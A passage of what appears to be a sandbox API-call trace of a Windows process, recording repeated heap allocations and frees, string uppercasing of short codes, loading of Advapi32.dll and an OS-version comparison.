hHeap=0x25c0000) returned 1 [0267.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0267.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0267.757] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.757] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0267.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.757] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0267.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0267.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.758] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0267.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0267.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0267.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0267.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0267.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0267.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0267.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0267.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0267.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0267.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0267.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0267.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.763] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0267.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0267.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0267.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0267.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.764] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0267.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0267.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1908 [0267.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0267.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0267.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0267.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0267.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0267.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0267.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0267.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0267.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0267.765] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0267.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0267.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0267.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0267.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0267.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0267.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0267.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0267.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0267.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0267.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0267.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0267.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0267.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0267.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0267.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0267.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0267.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0267.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0267.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0267.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0267.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0267.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0267.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0267.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0267.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0267.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0267.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0267.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0267.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.768] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0267.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0267.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0267.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0267.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0267.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0267.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0267.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0267.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0267.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0267.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0267.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0267.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0267.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0267.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0267.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0267.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0267.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.770] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.770] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0267.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0267.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0267.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0267.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0267.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0267.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0267.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.772] 